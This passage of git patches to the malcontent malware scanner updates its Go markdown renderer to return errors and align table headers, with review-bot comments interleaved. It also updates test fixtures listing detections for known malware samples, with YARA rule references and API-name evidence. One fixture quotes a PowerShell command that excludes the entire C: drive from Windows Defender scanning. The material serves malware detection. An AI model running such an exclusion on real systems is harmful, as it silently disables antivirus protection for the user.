`$op2` | | +CRITICAL | **[3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214)** | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`
`$xc2`
`$xc3` | diff --git a/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff index 3de65c25b..cfae167e1 100644 --- a/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff @@ -3,14 +3,14 @@ ### 2 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | +LOW | **[fs/directory/traverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-traverse.yara#fts)** | traverse filesystem hierarchy | [_fts_children](https://github.com/search?q=_fts_children&type=code)
[_fts_close](https://github.com/search?q=_fts_close&type=code)
[_fts_read](https://github.com/search?q=_fts_read&type=code)
[_fts_open](https://github.com/search?q=_fts_open&type=code)
[_fts_set](https://github.com/search?q=_fts_set&type=code) | | +LOW | **[fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink)** | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | ### 14 removed behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | -MEDIUM | [crypto/encrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/encrypt.yara#encrypt) | encrypts data | [Encryption initializati](https://github.com/search?q=Encryption+initializati&type=code)
[Encryption info](https://github.com/search?q=Encryption+info&type=code) | | -MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) | | -MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [user_agent](https://github.com/search?q=user_agent&type=code) | diff --git a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff index d8e821280..a6594bcba 100644 --- a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff @@ -3,7 +3,7 @@ ### 22 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)
[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) | | +CRITICAL | **[3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275)** | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)
[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)
`$sa1`
`$sa2`
`$op1`
`$op2` | | +CRITICAL | **[3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214)** | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`
`$xc2`
`$xc3` | diff --git a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff index d8e821280..a6594bcba 100644 --- a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff @@ -3,7 +3,7 @@ ### 22 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)
[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) | | +CRITICAL | **[3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275)** | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)
[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)
`$sa1`
`$sa2`
`$op1`
`$op2` | | +CRITICAL | **[3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214)** | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`
`$xc2`
`$xc3` | diff --git a/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff index 9c13f30ad..69c803731 100644 --- a/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff @@ -3,7 +3,7 @@ ### 14 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | +MEDIUM | **[crypto/encrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/encrypt.yara#encrypt)** | encrypts data | [Encryption initializati](https://github.com/search?q=Encryption+initializati&type=code)
[Encryption info](https://github.com/search?q=Encryption+info&type=code) | | +MEDIUM | **[fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path)** | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) | | +MEDIUM | **[impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent)** | references an 'agent' | [user_agent](https://github.com/search?q=user_agent&type=code) | @@ -22,7 +22,7 @@ ### 2 removed behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | -LOW | [fs/directory/traverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-traverse.yara#fts) | traverse filesystem hierarchy | [_fts_children](https://github.com/search?q=_fts_children&type=code)
[_fts_close](https://github.com/search?q=_fts_close&type=code)
[_fts_read](https://github.com/search?q=_fts_read&type=code)
[_fts_open](https://github.com/search?q=_fts_open&type=code)
[_fts_set](https://github.com/search?q=_fts_set&type=code) | | -LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | diff --git a/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md b/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md index eef35690b..684a43451 100644 --- a/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md +++ b/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md @@ -1,7 +1,7 @@ ## macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare [🛑 HIGH] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | HIGH | [anti-static/macho/footer](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/macho/footer.yara#high_entropy_trailer) | [higher-entropy machO trailer (normally NULL) - possible viral infection](https://www.virusbulletin.com/virusbulletin/2013/06/multiplatform-madness) | [_PAGEZERO](https://github.com/search?q=_PAGEZERO&type=code) | | HIGH | [impact/remote_access/net_term](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_term.yara#spectralblur_alike) | uploads, provides a terminal, runs program | [tcsetattr](https://github.com/search?q=tcsetattr&type=code)
[_waitpid](https://github.com/search?q=_waitpid&type=code)
[_unlink](https://github.com/search?q=_unlink&type=code)
[execve](https://github.com/search?q=execve&type=code)
[upload](https://github.com/search?q=upload&type=code)
[_uname](https://github.com/search?q=_uname&type=code)
[shell](https://github.com/search?q=shell&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff index c8ec1b9b0..e56ed61a4 100644 --- a/tests/macOS/clean/ls.mdiff +++ b/tests/macOS/clean/ls.mdiff @@ -3,14 +3,14 @@ ### 2 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | +LOW | **[fs/directory/traverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-traverse.yara#fts)** | traverse filesystem hierarchy | [_fts_children](https://github.com/search?q=_fts_children&type=code)
[_fts_close](https://github.com/search?q=_fts_close&type=code)
[_fts_read](https://github.com/search?q=_fts_read&type=code)
[_fts_open](https://github.com/search?q=_fts_open&type=code)
[_fts_set](https://github.com/search?q=_fts_set&type=code) | | +LOW | **[net/http](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http)** | Uses the HTTP protocol | [http](https://github.com/search?q=http&type=code) | ### 6 removed behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | -MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | | -LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[x86](https://github.com/search?q=x86&type=code) | | -LOW | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref) | references a specific operating system | [https://](https://)
[linux](https://github.com/search?q=linux&type=code) | diff --git a/tests/windows/2024.Sharp/sharpil_RAT.exe.md b/tests/windows/2024.Sharp/sharpil_RAT.exe.md index b9609b4f3..07f632913 100644 --- a/tests/windows/2024.Sharp/sharpil_RAT.exe.md +++ b/tests/windows/2024.Sharp/sharpil_RAT.exe.md @@ -1,7 +1,7 @@ ## windows/2024.Sharp/sharpil_RAT.exe [😈 CRITICAL] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | CRITICAL | [3P/ditekshen/telegramchatbot](https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1293-L1308) | Detects executables using Telegram Chat Bot, by [ditekSHen](https://github.com/ditekshen/detection) | `$s1`
`$s2`
`$s3`
`$s4`
`$p1`
`$p2`
`$p3`
`$p4` | | HIGH | [net/email/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/email/send.yara#SMTPClient_Send_creds) | sends e-mail with a hardcoded credentials | [NetworkCredential](https://github.com/search?q=NetworkCredential&type=code) | | MEDIUM | [c2/addr/discord](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/discord.yara#discord) | may report back to 'Discord' | [Discord](https://github.com/search?q=Discord&type=code) | diff --git a/tests/windows/2024.aspdasdksa2/Nil.exe.md b/tests/windows/2024.aspdasdksa2/Nil.exe.md index 29a700021..a552ac1fe 100644 --- a/tests/windows/2024.aspdasdksa2/Nil.exe.md +++ b/tests/windows/2024.aspdasdksa2/Nil.exe.md @@ -1,7 +1,7 @@ ## windows/2024.aspdasdksa2/Nil.exe [😈 CRITICAL] | RISK | KEY | DESCRIPTION | EVIDENCE | -|--|--|--|--| +|:--:|:--:|:--:|:--:| | CRITICAL | [impact/degrade/win_defender](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/degrade/win_defender.yara#win_defender_exclusion) | Uses powershell to define Windows Defender exclusions | [powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"](https://github.com/search?q=powershell+-Command+%22Add-MpPreference+-ExclusionPath+%27C%3A%5C%27%22&type=code) | | MEDIUM | [anti-behavior/anti_debugger](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/anti-debugger.yara#win_debugger_present) | Detects if process is being executed within a debugger or VM | [UnhandledExceptionFilter](https://github.com/search?q=UnhandledExceptionFilter&type=code)
[IsDebuggerPresent](https://github.com/search?q=IsDebuggerPresent&type=code) | | MEDIUM | [data/embedded/app_manifest](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/app-manifest.yara#app_manifest) | [Contains embedded Microsoft Windows application manifest](https://learn.microsoft.com/en-us/cpp/build/reference/manifestuac-embeds-uac-information-in-manifest?view=msvc-170) | [requestedExecutionLevel](https://github.com/search?q=requestedExecutionLevel&type=code)
[requestedPrivileges](https://github.com/search?q=requestedPrivileges&type=code) | From 306e852290de17b2166c42a979ee7b5e19bfe129 Mon Sep 17 00:00:00 2001 From: egibs <20933572+egibs@users.noreply.github.com> Date: Thu, 29 May 2025 08:12:37 -0500 Subject: [PATCH 2/4] Handle checking for new errors Signed-off-by: egibs <20933572+egibs@users.noreply.github.com> --- pkg/render/markdown.go | 48 ++++++++++++++++++++++++++++++------------ 1 file changed, 35 insertions(+), 13 deletions(-) diff --git a/pkg/render/markdown.go b/pkg/render/markdown.go index d5ef5d94c..13468b8f4 100644 --- a/pkg/render/markdown.go +++ b/pkg/render/markdown.go @@ -56,7 +56,9 @@ func (r Markdown) Scanning(_ context.Context, _ string) {} func (r Markdown) File(ctx context.Context, fr *malcontent.FileReport) error { if fr.Skipped == "" && len(fr.Behaviors) > 0 { - markdownTable(ctx, fr, r.w, tableConfig{Title: fmt.Sprintf("## %s [%s]", fr.Path, mdRisk(fr.RiskScore, fr.RiskLevel))}) + if err := markdownTable(ctx, fr, r.w, tableConfig{Title: fmt.Sprintf("## %s [%s]", fr.Path, mdRisk(fr.RiskScore, fr.RiskLevel))}); err != nil { + return err + } } return nil } 
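Review bot: In `File`, the new `if err := markdownTable(...); err != nil { return err }` is immediately followed by the function's own `return nil`, so the guard body can simply be `return markdownTable(ctx, fr, r.w, tableConfig{Title: fmt.Sprintf("## %s [%s]", fr.Path, mdRisk(fr.RiskScore, fr.RiskLevel))})`, the usual Go shape when nothing happens between the call and the return. If the explicit check is kept, wrapping with the report path, `return fmt.Errorf("rendering %s: %w", fr.Path, err)`, would at least tell the caller which file's table failed; `%w` keeps `errors.Is(err, context.Canceled)` working for the `ctx.Err()` that `markdownTable` now returns. The skipped/no-behaviors path is unaffected either way.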
@@ -71,11 +73,15 @@ func (r Markdown) Full(ctx context.Context, _ *malcontent.Config, rep *malconten } for removed := rep.Diff.Removed.Oldest(); removed != nil; removed = removed.Next() { - markdownTable(ctx, removed.Value, r.w, tableConfig{Title: fmt.Sprintf("## Deleted: %s [%s]", removed.Key, mdRisk(removed.Value.RiskScore, removed.Value.RiskLevel)), DiffRemoved: true}) + if err := markdownTable(ctx, removed.Value, r.w, tableConfig{Title: fmt.Sprintf("## Deleted: %s [%s]", removed.Key, mdRisk(removed.Value.RiskScore, removed.Value.RiskLevel)), DiffRemoved: true}); err != nil { + return err + } } for added := rep.Diff.Added.Oldest(); added != nil; added = added.Next() { - markdownTable(ctx, added.Value, r.w, tableConfig{Title: fmt.Sprintf("## Added: %s [%s]", added.Key, mdRisk(added.Value.RiskScore, added.Value.RiskLevel)), DiffAdded: true}) + if err := markdownTable(ctx, added.Value, r.w, tableConfig{Title: fmt.Sprintf("## Added: %s [%s]", added.Key, mdRisk(added.Value.RiskScore, added.Value.RiskLevel)), DiffAdded: true}); err != nil { + return err + } } for modified := rep.Diff.Modified.Oldest(); modified != nil; modified = modified.Next() { @@ -129,12 +135,14 @@ func (r Markdown) Full(ctx context.Context, _ *malcontent.Config, rep *malconten if count > 1 { noun = "behaviors" } - markdownTable(ctx, modified.Value, r.w, tableConfig{ + if err := markdownTable(ctx, modified.Value, r.w, tableConfig{ Title: fmt.Sprintf("### %d %s %s", count, qual, noun), SkipRemoved: true, SkipExisting: true, SkipNoDiff: true, - }) + }); err != nil { + return err + } } if removed > 0 { 
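Review bot: The two new error returns in `Full`'s removed/added loops hand back `markdownTable`'s error bare, so a failure in a report with many entries gives no indication of which entry could not be rendered; since `fmt` is already in scope, wrap it with the map key, e.g. `return fmt.Errorf("rendering %s: %w", removed.Key, err)` (and `added.Key` in the second loop). Using `%w` keeps `errors.Is(err, context.Canceled)` working for the `ctx.Err()` that `markdownTable` now returns on cancellation. The same applies to the modified-entry tables in the following hunks. `Full` starts before this hunk and ends after it.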
@@ -144,12 +152,14 @@ func (r Markdown) Full(ctx context.Context, _ *malcontent.Config, rep *malconten if count > 1 { noun = "behaviors" } - markdownTable(ctx, modified.Value, r.w, tableConfig{ + if err := markdownTable(ctx, modified.Value, r.w, tableConfig{ Title: fmt.Sprintf("### %d %s %s", count, qual, noun), SkipAdded: true, SkipExisting: true, SkipNoDiff: true, - }) + }); err != nil { + return err + } } if noDiff > 0 { @@ -159,9 +169,13 @@ func (r Markdown) Full(ctx context.Context, _ *malcontent.Config, rep *malconten return nil } -func markdownTable(ctx context.Context, fr *malcontent.FileReport, w io.Writer, rc tableConfig) { - if ctx.Err() != nil || fr.Skipped != "" { - return +func markdownTable(ctx context.Context, fr *malcontent.FileReport, w io.Writer, rc tableConfig) error { + if ctx.Err() != nil { + return ctx.Err() + } + + if fr.Skipped != "" { + return nil } kbs := make([]KeyedBehavior, 0, len(fr.Behaviors)) @@ -173,7 +187,7 @@ func markdownTable(ctx context.Context, fr *malcontent.FileReport, w io.Writer, if fr.PreviousRelPath != "" && rc.Title != "" { fmt.Fprintf(w, "%s\n\n", rc.Title) } - return + return nil } if rc.Title != "" { @@ -260,12 +274,20 @@ func markdownTable(ctx context.Context, fr *malcontent.FileReport, w io.Writer, tablewriter.WithRowAutoWrap(0), ) table.Header([]string{"Risk", "Key", "Description", "Evidence"}) - table.Bulk(data) // Add Bulk Data - table.Render() + // Add Bulk Data + if err := table.Bulk(data); err != nil { + return err + } + + if err := table.Render(); err != nil { + return err + } // remove excess whitespace s := buf.String() s = excessSpaceRe.ReplaceAllString(s, " ") s = excessDashRe.ReplaceAllString(s, "--") fmt.Fprintf(w, "%s\n", s) + + return nil } From e4c72b0858734465768c1147bf6c2c026dd8e481 Mon Sep 17 00:00:00 2001 From: egibs <20933572+egibs@users.noreply.github.com> Date: Thu, 29 May 2025 08:28:33 -0500 Subject: [PATCH 3/4] Tweak alignment 
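Review bot: `markdownTable` now has three distinct outcomes but no doc comment saying which is which: it returns `ctx.Err()` when the context is already done, `nil` without rendering a table when `fr.Skipped` is set (and, per the next hunk, on an apparently-empty early return that may still write `rc.Title`), and otherwise the first error from the table calls. A short comment above the signature would pin that contract for the call sites in `File` and `Full`, e.g. `// markdownTable writes fr's behaviors to w as a markdown table. It returns ctx.Err() if ctx is already cancelled, nil when fr was skipped or has nothing to tabulate, and the first error from building or rendering the table otherwise.` The two `ctx.Err()` calls could also be collapsed into one local, but that is cosmetic. The function body continues past this hunk.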
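Review bot: The final `fmt.Fprintf(w, "%s\n", s)` still discards its error even though `markdownTable` now returns one, so a short or failed write to `w` (closed pipe, full disk) is silently lost while a `table.Render` failure into the in-memory `buf` is reported; propagate it with `if _, err := fmt.Fprintf(w, "%s\n", s); err != nil { return err }` before the closing `return nil`. The title write `fmt.Fprintf(w, "%s\n\n", rc.Title)` in the earlier hunk has the same gap. The relocated `// Add Bulk Data` comment only restates the call and could be dropped. The function starts before this hunk.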
Signed-off-by: egibs <20933572+egibs@users.noreply.github.com> --- pkg/render/markdown.go | 7 ++++++- .../2024.lottie-player/lottie-player.min.js.mdiff | 4 ++-- tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md | 2 +- tests/linux/2023.ConnectBack/tiny.md | 2 +- tests/linux/2024.Darkcracks/darkcracks.sh.md | 2 +- tests/linux/UPX/06ed158.md | 2 +- tests/linux/clean/code-oss.md | 2 +- tests/linux/clean/cpack.md | 2 +- tests/linux/clean/ls.x86_64.md | 2 +- tests/linux/clean/lslogins.md | 2 +- tests/linux/clean/pandoc.md | 2 +- tests/linux/clean/ping.x86_64.md | 2 +- tests/linux/clean/qemu-system-xtensa.md | 2 +- tests/linux/clean/redis-server.aarch64.md | 2 +- tests/linux/clean/slack.md | 2 +- tests/linux/clean/tree-sitter.md | 2 +- tests/linux/clean/trufflehog.md | 2 +- tests/linux/clean/viewgam.md | 2 +- tests/linux/clean/zipdetails.md | 2 +- tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff | 2 +- tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff | 2 +- tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff | 4 ++-- tests/macOS/2023.3CX/libffmpeg.dirty.mdiff | 2 +- tests/macOS/2023.3CX/libffmpeg.increase.mdiff | 2 +- tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff | 4 ++-- .../macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md | 2 +- tests/macOS/clean/ls.mdiff | 4 ++-- tests/windows/2024.Sharp/sharpil_RAT.exe.md | 2 +- tests/windows/2024.aspdasdksa2/Nil.exe.md | 2 +- 29 files changed, 38 insertions(+), 33 deletions(-) diff --git a/pkg/render/markdown.go b/pkg/render/markdown.go index 13468b8f4..8891710f1 100644 --- a/pkg/render/markdown.go +++ b/pkg/render/markdown.go 
@@ -269,8 +269,13 @@ func markdownTable(ctx context.Context, fr *malcontent.FileReport, w io.Writer, buf := bytes.NewBuffer([]byte{}) table := tablewriter.NewTable(buf, + tablewriter.WithConfig(tablewriter.Config{ + Header: tw.CellConfig{ + Alignment: tw.CellAlignment{Global: tw.AlignLeft}, + }, + }), tablewriter.WithRenderer(renderer.NewMarkdown()), - tablewriter.WithRendition(tw.Rendition{Symbols: tw.NewSymbols(tw.StyleDefault)}), + tablewriter.WithRendition(tw.Rendition{Symbols: tw.NewSymbols(tw.StyleMarkdown)}), tablewriter.WithRowAutoWrap(0), ) table.Header([]string{"Risk", "Key", "Description", "Evidence"}) diff --git a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff index 493e9d08d..60abcc9f1 100644 --- a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff +++ b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff @@ -3,7 +3,7 @@ ### 49 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | +CRITICAL | **[exfil/stealer/wallet](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/stealer/wallet.yara#crypto_stealer_names)** | makes HTTPS connections and references multiple wallets by name | [Coinbase_Wordmark_SubBrands_ALL](https://github.com/search?q=Coinbase_Wordmark_SubBrands_ALL&type=code)
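Review bot: The new `WithConfig` block forces left alignment on the header without saying why, and the fixture changes in this same commit (`|:--:|` becoming `|:--|`) are the only clue that it exists to steer the markdown separator row rather than any visible column; a comment would keep the next tablewriter bump from "cleaning it up", e.g. `// Force left-aligned header cells so the separator row renders as |:--| (v1 appears to default to the centered |:--:|), matching the committed test fixtures.` Only header alignment is configured, so row alignment presumably stays at the library default — worth confirming that is intended, since `excessSpaceRe`/`excessDashRe` post-processing runs over the whole rendered string. The function starts before this hunk and ends after it.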
[CoinbaseInjectedProvider](https://github.com/search?q=CoinbaseInjectedProvider&type=code)
[CoinbaseWalletDeeplink](https://github.com/search?q=CoinbaseWalletDeeplink&type=code)
[CoinbaseInjectedSigner](https://github.com/search?q=CoinbaseInjectedSigner&type=code)
[CoinbaseWalletProvider](https://github.com/search?q=CoinbaseWalletProvider&type=code)
[CoinbaseTransactions](https://github.com/search?q=CoinbaseTransactions&type=code)
[CoinbaseWalletRound](https://github.com/search?q=CoinbaseWalletRound&type=code)
[CoinbaseWalletSteps](https://github.com/search?q=CoinbaseWalletSteps&type=code)
[CoinbaseWalletLogo](https://github.com/search?q=CoinbaseWalletLogo&type=code)
[CoinbaseWalletSDK](https://github.com/search?q=CoinbaseWalletSDK&type=code)
[CoinbaseOnRampURL](https://github.com/search?q=CoinbaseOnRampURL&type=code)
[CoinbaseConnector](https://github.com/search?q=CoinbaseConnector&type=code)
[CoinbaseBrowser](https://github.com/search?q=CoinbaseBrowser&type=code)
[BraveWallet](https://github.com/search?q=BraveWallet&type=code)
[Ronin](https://github.com/search?q=Ronin&type=code)
[http](https://github.com/search?q=http&type=code) | | +HIGH | **[anti-static/obfuscation/bitwise](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/bitwise.yara#unsigned_bitwise_math_excess)** | [uses an excessive amount of unsigned bitwise math](https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection) | [function(](https://github.com/search?q=function%28&type=code)
[charAt(s](https://github.com/search?q=charAt%28s&type=code)
[charAt(a](https://github.com/search?q=charAt%28a&type=code)
[charAt(n](https://github.com/search?q=charAt%28n&type=code)
[charAt(c](https://github.com/search?q=charAt%28c&type=code)
[charAt(t](https://github.com/search?q=charAt%28t&type=code)
[charAt(u](https://github.com/search?q=charAt%28u&type=code)
[charAt(w](https://github.com/search?q=charAt%28w&type=code)
[e>>>28](https://github.com/search?q=e%3E%3E%3E28&type=code)
[c>>>31](https://github.com/search?q=c%3E%3E%3E31&type=code)
[e>>>64](https://github.com/search?q=e%3E%3E%3E64&type=code)
[t>>>64](https://github.com/search?q=t%3E%3E%3E64&type=code)
[a>>>16](https://github.com/search?q=a%3E%3E%3E16&type=code)
[e>>>24](https://github.com/search?q=e%3E%3E%3E24&type=code)
[a>>>13](https://github.com/search?q=a%3E%3E%3E13&type=code)
[r>>>10](https://github.com/search?q=r%3E%3E%3E10&type=code)
[e>>>32](https://github.com/search?q=e%3E%3E%3E32&type=code)
[e>>>10](https://github.com/search?q=e%3E%3E%3E10&type=code)
[e>>>16](https://github.com/search?q=e%3E%3E%3E16&type=code)
[o>>>16](https://github.com/search?q=o%3E%3E%3E16&type=code)
[o>>>24](https://github.com/search?q=o%3E%3E%3E24&type=code)
[o>>>22](https://github.com/search?q=o%3E%3E%3E22&type=code)
[a>>>26](https://github.com/search?q=a%3E%3E%3E26&type=code)
[s>>>26](https://github.com/search?q=s%3E%3E%3E26&type=code)
[d>>>26](https://github.com/search?q=d%3E%3E%3E26&type=code)
[e>>>26](https://github.com/search?q=e%3E%3E%3E26&type=code)
[n>>>13](https://github.com/search?q=n%3E%3E%3E13&type=code)
[n>>>24](https://github.com/search?q=n%3E%3E%3E24&type=code)
[s>>>24](https://github.com/search?q=s%3E%3E%3E24&type=code)
[u>>>24](https://github.com/search?q=u%3E%3E%3E24&type=code)
[a>>>32](https://github.com/search?q=a%3E%3E%3E32&type=code)
[u>>>31](https://github.com/search?q=u%3E%3E%3E31&type=code)
[i>>>27](https://github.com/search?q=i%3E%3E%3E27&type=code)
[p>>>18](https://github.com/search?q=p%3E%3E%3E18&type=code)
[m>>>17](https://github.com/search?q=m%3E%3E%3E17&type=code)
[m>>>19](https://github.com/search?q=m%3E%3E%3E19&type=code)
[m>>>10](https://github.com/search?q=m%3E%3E%3E10&type=code)
[i>>>13](https://github.com/search?q=i%3E%3E%3E13&type=code)
[i>>>22](https://github.com/search?q=i%3E%3E%3E22&type=code)
[a>>>11](https://github.com/search?q=a%3E%3E%3E11&type=code)
[a>>>25](https://github.com/search?q=a%3E%3E%3E25&type=code)
[e>>>19](https://github.com/search?q=e%3E%3E%3E19&type=code)
[e>>>29](https://github.com/search?q=e%3E%3E%3E29&type=code)
[b>>>31](https://github.com/search?q=b%3E%3E%3E31&type=code)
[y>>>31](https://github.com/search?q=y%3E%3E%3E31&type=code)
[d>>>24](https://github.com/search?q=d%3E%3E%3E24&type=code)
[e>>>13](https://github.com/search?q=e%3E%3E%3E13&type=code)
[f>>>24](https://github.com/search?q=f%3E%3E%3E24&type=code)
